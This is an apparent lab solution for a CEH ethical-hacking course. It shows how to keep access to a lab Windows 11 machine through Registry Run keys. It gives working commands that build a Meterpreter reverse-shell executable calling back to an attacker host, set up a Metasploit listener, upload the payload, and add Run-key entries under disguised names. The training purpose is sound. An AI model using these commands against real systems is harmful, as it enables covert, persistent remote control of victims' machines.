Lab Solution: Module 6, Lab 3, Task 2 -

Maintain Persistence by Modifying

Registry Run Keys

Introduction
This document details the steps to complete Task 2 of Lab 3 from Module 06 (System
Hacking) of the CEH v13 Lab Manual. The objective is to establish persistence on a
compromised Windows 11 machine by creating a malicious payload and configuring it to
run automatically upon user login using Windows Registry Run keys.

Lab Environment
• Attacker Machine: Parrot Security VM (IP: 10.10.1.13 - Example from Manual)
• Target Machine: Windows 11 VM
• Credentials: Parrot (attacker/toor)

Procedure

Step 1: Initial Setup

Ensure both the Parrot Security and Windows 11 virtual machines are powered on and
networked correctly. Log in to the Parrot Security VM using the provided credentials
(attacker/toor).

Step 2: Generate Payload for Persistence

Open a terminal window on the Parrot Security machine. Elevate privileges to root using
sudo su (password: toor) and navigate to the root directory using cd . Generate a
Meterpreter payload using msfvenom . This payload will be configured to run
automatically on the target machine.

msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.1.13

lport=4444 -f exe > /home/attacker/Desktop/registry.exe
(Note: Replace 10.10.1.13 with the actual IP address of your Parrot Security VM. The
lab manual uses LPORT 4444 for this task. Adjust the output path /home/attacker/
Desktop/registry.exe if necessary.)

Step 3: Setup Metasploit Handler

Launch the Metasploit Framework console ( msfconsole ). Configure a listener to

receive the connection from the persistence payload.

use multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 10.10.1.13
set lport 4444
exploit -j -z
This starts the listener for the persistence payload in the background.

Step 4: Transfer Payload to Target

Transfer the generated registry.exe file from the Parrot VM to the Windows 11 VM.
Use a method that places the file in a known, stable location on the target machine, for
example, C:\Users\Public\registry.exe . Methods include using a web server,
shared folders, or exploiting an existing Meterpreter session (if available from a previous
compromise) using the upload command.

(Assuming an existing Meterpreter session (Session 1) is available)

upload /home/attacker/Desktop/registry.exe C:\\Users\\Public\

\registry.exe
Step 5: Modify Registry Run Key via Meterpreter

If you have an active Meterpreter session on the target machine (let's assume Session 1),
you can use Meterpreter commands to modify the registry. Use the reg command to
add an entry to the
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run key.
This will cause registry.exe to execute every time the current user logs in.

reg setval -k HKCU\\Software\\Microsoft\\Windows\

\CurrentVersion\\Run -v "MyBackdoor" -d "C:\\Users\\Public\
\registry.exe"

(Note: Replace MyBackdoor with a less obvious name if desired. Ensure the path -d
matches the location where you saved registry.exe .)
Alternatively, if you have SYSTEM privileges (e.g., from the previous UAC bypass lab), you
could add it to HKEY_LOCAL_MACHINE to run for all users:

reg setval -k HKLM\\Software\\Microsoft\\Windows\

\CurrentVersion\\Run -v "SystemUpdateService" -d "C:\\Users\
\Public\\registry.exe"

Step 6: Verify Registry Modification (Optional)

Still within the Meterpreter session, you can query the registry key to confirm the value
was added correctly.
 reg queryval -k HKCU\\Software\\Microsoft\\Windows\
\CurrentVersion\\Run -v "MyBackdoor"

Or for HKLM:

reg queryval -k HKLM\\Software\\Microsoft\\Windows\

\CurrentVersion\\Run -v "SystemUpdateService"

You can also verify this manually on the Windows 11 machine using regedit.exe and
navigating to the respective Run key.
Step 7: Test Persistence

Restart the Windows 11 virtual machine. Log back into the user account for which the
Run key was modified (e.g., the Admin user if HKCU was used, or any user if HKLM was
used).

Switch back to the Parrot Security VM's Metasploit console where the handler for port
4444 is running. After the Windows user logs in, the registry.exe payload should
execute automatically, and a new Meterpreter session should open in your handler.

Use the sessions command to see the new session.

Step 8: Conclusion and Cleanup

You have successfully established persistence on the target machine by adding a

malicious payload to the Windows Registry Run keys. This ensures the payload executes
automatically upon user login, granting you continued access. Document your findings.
Close all Meterpreter sessions and shut down the virtual machines.

(Optional Cleanup: To remove the persistence, use the reg deleteval command in
Meterpreter targeting the appropriate key and value name, or manually delete the entry
using regedit.exe on the target machine before shutting down.)

Note: Due to limitations in generating images depicting specific exploit commands or

outputs, generic placeholder images representing the relevant interfaces (terminal,
Metasploit console, Windows prompts, Registry Editor) are used below. The descriptions
accurately reflect the expected content of each screenshot.